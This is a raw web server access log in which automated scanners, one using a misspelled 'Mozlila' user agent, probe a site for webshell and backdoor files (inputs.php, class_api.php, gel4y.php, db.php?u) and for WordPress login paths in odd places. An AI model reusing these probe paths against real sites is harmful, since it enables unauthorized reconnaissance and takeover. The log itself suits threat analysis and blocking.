144.126.240.247 - - [12/Aug/2025:13:16:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:13:16:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:16:28 -0400] "GET /wp-content/themes/gaukingo/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:17:02 -0400] "GET /wp-content/themes/intense/block-css.php?mode=upload HTTP/1.1" 301 286 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
31.13.115.115 - - [12/Aug/2025:13:17:05 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
94.16.113.252 - - [12/Aug/2025:13:18:12 -0400] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:18:29 -0400] "GET /wp-content/themes/hideo/network.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
216.73.216.186 - - [12/Aug/2025:13:20:13 -0400] "GET /.well-known/acme-challenge/VF375WB2J1HL_JHTTYKHYRE8U2V8WIH2 HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
152.42.157.60 - - [12/Aug/2025:13:20:46 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.89.216.7 - - [12/Aug/2025:13:20:47 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
174.138.112.39 - - [12/Aug/2025:13:20:47 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
170.64.252.169 - - [12/Aug/2025:13:20:47 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:22:22 -0400] "GET /ioxi002.PhP7 HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:22:40 -0400] "GET /ynz.PhP7 HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:22:58 -0400] "GET /themes.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:23:20 -0400] "GET /erin1.PhP7 HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:23:36 -0400] "GET /themes.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:23:40 -0400] "GET /fosil.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:23:58 -0400] "GET /ws.php.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:24:23 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:24:45 -0400] "GET /wp-admin/user/wp-login.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:25:06 -0400] "GET /wp-includes/images/wp-login.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:25:29 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:25:49 -0400] "GET /wp-admin/wp-login.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:26:14 -0400] "GET /wp-includes/wp-login.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:26:31 -0400] "GET /cgi-bin/wp-login.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:26:45 -0400] "GET /.wp-cli/wp-login.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:27:07 -0400] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
149.50.215.205 - - [12/Aug/2025:13:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:13:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.214 - - [12/Aug/2025:13:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:13:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:13:30:39 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
144.126.240.247 - - [12/Aug/2025:13:30:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.203.144 - - [12/Aug/2025:13:30:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.190.67 - - [12/Aug/2025:13:30:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
68.183.245.101 - - [12/Aug/2025:13:32:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:13:32:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:13:32:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:13:32:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
146.190.11.185 - - [12/Aug/2025:13:38:06 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:13:38:06 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
164.90.241.135 - - [12/Aug/2025:13:38:06 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.203.144.167 - - [12/Aug/2025:13:38:06 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:40:28 -0400] "GET /cgi-bin/class_api.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:42:18 -0400] "GET /wp-admin/images/class.api.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
149.50.215.205 - - [12/Aug/2025:13:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.214 - - [12/Aug/2025:13:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:13:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:13:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:43:41 -0400] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 277 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:44:22 -0400] "GET /wp-admin/js/widgets/class.api.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
212.143.94.239 - - [12/Aug/2025:13:44:27 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
31.186.39.146 - - [12/Aug/2025:13:46:40 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
68.183.245.101 - - [12/Aug/2025:13:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:13:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:13:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:13:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:48:28 -0400] "GET /.well-known/pki-validation/class_api.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.220.149.114 - - [12/Aug/2025:13:48:56 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
94.16.113.252 - - [12/Aug/2025:13:49:18 -0400] "GET /class_api.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
152.42.157.60 - - [12/Aug/2025:13:50:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.89.216.7 - - [12/Aug/2025:13:50:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
170.64.252.169 - - [12/Aug/2025:13:50:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
174.138.112.39 - - [12/Aug/2025:13:50:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:51:39 -0400] "GET /class.api.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
18.222.251.173 - - [12/Aug/2025:13:54:45 -0400] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 301 296 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
149.50.215.205 - - [12/Aug/2025:13:56:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:13:56:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:13:56:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.214 - - [12/Aug/2025:13:56:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:13:57:24 -0400] "GET /wp-includes/images/include.php HTTP/1.1" 301 265 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
94.16.113.252 - - [12/Aug/2025:13:58:05 -0400] "GET /wp-content/plugins/wp-daft/t62.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
86.8.204.43 - - [12/Aug/2025:14:02:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [12/Aug/2025:14:02:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:14:02:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:14:02:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:14:02:28 -0400] "GET /inputs.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
209.38.125.40 - - [12/Aug/2025:14:02:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
144.126.240.247 - - [12/Aug/2025:14:02:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.203.144 - - [12/Aug/2025:14:02:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.190.67 - - [12/Aug/2025:14:02:41 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
94.16.113.252 - - [12/Aug/2025:14:03:37 -0400] "GET /wp-includes/inputs.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:04:47 -0400] "GET /wp-content/uploads/inputs.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:05:30 -0400] "GET /wp-content/plugins/wordpress-three/miin.php HTTP/1.1" 301 278 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:05:52 -0400] "GET /wp-content/plugins/inputs.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
146.190.11.185 - - [12/Aug/2025:14:06:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:14:06:51 -0400] "GET /wp-admin/inputs.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
206.189.247.132 - - [12/Aug/2025:14:06:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
164.90.241.135 - - [12/Aug/2025:14:06:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.203.144.167 - - [12/Aug/2025:14:06:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
94.16.113.252 - - [12/Aug/2025:14:07:33 -0400] "GET /images/inputs.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:08:23 -0400] "GET /.well-known/acme-challenge/inputs.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:09:11 -0400] "GET /wp-atom.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:09:24 -0400] "GET /wp-content/themes/inputs.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:09:58 -0400] "GET /ticket/vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:10:07 -0400] "GET /vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
94.16.113.252 - - [12/Aug/2025:14:10:08 -0400] "GET /wp-content/inputs.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
